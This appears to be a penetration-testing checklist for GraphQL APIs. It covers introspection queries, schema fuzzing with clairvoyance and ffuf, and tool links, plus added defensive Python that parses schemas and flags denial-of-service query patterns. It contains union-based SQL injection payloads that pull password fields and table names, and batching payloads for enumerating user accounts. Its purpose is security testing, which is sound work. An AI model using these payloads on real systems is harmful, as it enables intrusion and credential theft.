# GraphQL

## Checklist

* [ ] Exposed GraphQL console (GraphQL development console).
* [ ] Introspection enabled (GraphQL introspection).

<details>

<summary>Older versions</summary>

```graphql
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      args {
        ...InputValue
      }
      onOperation
      onFragment
      onField
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
      }
    }
  }
}
```

</details>

<details>

<summary>Modern versions</summary>

```graphql
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type { ...TypeRef }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}
```

</details>

<details>

<summary>Retrieve mutations</summary>

```graphql
query {
  __schema {
    mutationType {
      name
      fields {
        name
        args {
          name
          defaultValue
          type {
            ...TypeRef
          }
        }
      }
    }
  }
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}
```

</details>
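The `TypeRef` fragment returns every argument type as a nested `kind`/`name`/`ofType` chain, which is tedious to read when auditing which mutations a schema exposes. The following Python example is added here and is not part of the original page; it parses a constructed sample of the mutation-type response above (the `updateUser` mutation and its argument types are invented) into SDL-style signatures.

```python
import json

# Constructed sample: the shape of the response to the "Retrieve mutations" query
# above, trimmed to a single invented mutation with two arguments.
SAMPLE_INTROSPECTION = json.loads("""
{"data": {"__schema": {"mutationType": {
  "name": "Mutation",
  "fields": [{
    "name": "updateUser",
    "args": [
      {"name": "id", "defaultValue": null,
       "type": {"kind": "NON_NULL", "name": null,
                "ofType": {"kind": "SCALAR", "name": "ID", "ofType": null}}},
      {"name": "roles", "defaultValue": null,
       "type": {"kind": "LIST", "name": null,
                "ofType": {"kind": "NON_NULL", "name": null,
                           "ofType": {"kind": "ENUM", "name": "Role", "ofType": null}}}}
    ]
  }]
}}}}
""")

def type_signature(type_ref: dict) -> str:
    """Collapse a nested TypeRef (kind/name/ofType chain) into SDL notation,
    e.g. LIST -> NON_NULL -> ENUM Role becomes '[Role!]'."""
    kind = type_ref["kind"]
    if kind == "NON_NULL":
        return type_signature(type_ref["ofType"]) + "!"
    if kind == "LIST":
        return "[" + type_signature(type_ref["ofType"]) + "]"
    return type_ref["name"]          # SCALAR, OBJECT, ENUM, INPUT_OBJECT, ...

def list_mutations(introspection: dict) -> list:
    """Return one 'name(arg: Type, ...)' line per mutation, or [] if the
    schema exposes no mutation type."""
    mutation_type = introspection["data"]["__schema"].get("mutationType")
    if not mutation_type:
        return []
    lines = []
    for field in mutation_type["fields"]:
        args = ", ".join(f"{a['name']}: {type_signature(a['type'])}" for a in field["args"])
        lines.append(f"{field['name']}({args})")
    return lines

if __name__ == "__main__":
    print("\n".join(list_mutations(SAMPLE_INTROSPECTION)))
```

The same unwrapping applies to `fields` and `inputFields` of any type returned by the full introspection query, since they use the identical `TypeRef` shape.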

<details>

<summary>Query an object's input fields</summary>

```graphql
{
  __type(name: "<object-name>") {
    name
    inputFields {
      name
      description
      defaultValue
    }
  }
}
```

</details>

* [ ] If introspection is disabled, use field suggestions (GraphQL suggestions) or fuzz the schema.

```sh
# GraphQL suggestions
clairvoyance -H "<header>: <value>" -c 1 -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress

# Fuzzing queries
ffuf -u http://<target>/graphql -w <wordlist.txt>:FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html
```

* [ ] Debugging and information disclosure (GraphQL error handling).
* [ ] Look for IDOR (Insecure Direct Object Reference).
* [ ] Manipulate mutations, which are used to perform data-modifying actions.
* [ ] Injection attacks.

```graphql
# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}
```

* [ ] Batching attack.

```graphql
# JSON list based batching
[
  {"query":"{user(username: \"user\") {id,name,password}}"},
  {"query":"{user(username: \"admin\") {id,name,password}}"},
  {"query":"{user(username: \"root\") {id,name,password}}"}
]
```

```graphql
# Query name based batching
{"query":"{
  first: user(username:\"user\"){id,name,password}
  second: user(username:\"admin\") {id,name,password}
  third: user(username:\"root\") {id,name,password}
}"}
```

* [ ] Denial-of-service (DoS) attacks.
  * [ ] Batching attack.
  * [ ] Circular reference (deep recursion).
  * [ ] Field duplication.
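From the defender's side, the three DoS patterns above (batching, deep recursion, field duplication) can be bounded before a request reaches the resolvers. The following Python example is added here and is not the page's or any project's code: it tokenises request bodies shaped like the batching payloads above, computes nesting depth and per-selection-set field count (aliases and arguments excluded), and reports which limit a body exceeds. The sample bodies and the limit values are constructed.

```python
import json
import re

# Constructed request bodies shaped like the batching and recursion patterns above.
LIST_BATCH = json.dumps([{"query": '{user(username: "user") {id}}'},
                         {"query": '{user(username: "admin") {id}}'},
                         {"query": '{user(username: "root") {id}}'}])
ALIAS_BATCH = json.dumps({"query": '{ a: user(username:"user"){id} '
                                   'b: user(username:"admin"){id} '
                                   'c: user(username:"root"){id} }'})
DEEP_QUERY = json.dumps({"query": '{ user { friends { friends { friends { id } } } } }'})

TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_][A-Za-z0-9_]*|[{}():]')

def selection_stats(query: str):
    """Return (max_depth, max_breadth): deepest brace nesting and the largest
    number of fields selected in any single selection set."""
    depth = paren = max_depth = max_breadth = 0
    counts = []                      # fields seen in each open selection set
    tokens = TOKEN.findall(query)
    for i, tok in enumerate(tokens):
        if tok == "{":
            depth += 1; max_depth = max(max_depth, depth); counts.append(0)
        elif tok == "}" and counts:
            max_breadth = max(max_breadth, counts.pop()); depth -= 1
        elif tok in ("(", ")"):
            paren += 1 if tok == "(" else -1
        elif tok[0] == '"' or tok == ":" or paren or not counts:
            continue                 # literal, argument, or outside a selection set
        elif i + 1 < len(tokens) and tokens[i + 1] == ":":
            continue                 # alias label; the aliased field follows it
        else:
            counts[-1] += 1
    return max_depth, max_breadth

def flag_request(body: str, max_depth=5, max_breadth=20, max_batch=5):
    """Apply the limits to one HTTP request body (single object or JSON list)."""
    payload = json.loads(body)
    operations = payload if isinstance(payload, list) else [payload]
    reasons = []
    if len(operations) > max_batch:
        reasons.append(f"batch of {len(operations)} operations")
    for op in operations:
        d, b = selection_stats(op.get("query", ""))
        if d > max_depth:
            reasons.append(f"depth {d}")
        if b > max_breadth:
            reasons.append(f"{b} fields in one selection set")
    return reasons
```

Production servers normally enforce the same limits with their framework's depth-limit, complexity and batch-size settings; this scanner is only meant to make the three patterns concrete.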

## Tools

### Clairvoyance

* <https://github.com/nikitastupin/clairvoyance>

```sh
clairvoyance -H "<header>: <value>" -c <concurrent-requests> -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
```

### graphw00f

* <https://github.com/dolevf/graphw00f>

```sh
main.py -d -f -t <target>
```

### GraphQL Cop

* <https://github.com/dolevf/graphql-cop>

```sh
graphql-cop.py -t <target>/graphql
```

### GraphQLmap

* <https://github.com/swisskyrepo/GraphQLmap>

```sh
graphqlmap.py -u <target>/graphql
```

### InQL

* <https://github.com/doyensec/inql>

### GraphQL Voyager

* <https://apis.guru/graphql-voyager/>
* <https://github.com/APIs-guru/graphql-voyager>

### Altair GraphQL Client

* <https://altair.sirmuel.design/>
* <https://github.com/altair-graphql/altair>

## Wordlists

* <https://github.com/Escape-Technologies/graphql-wordlist>
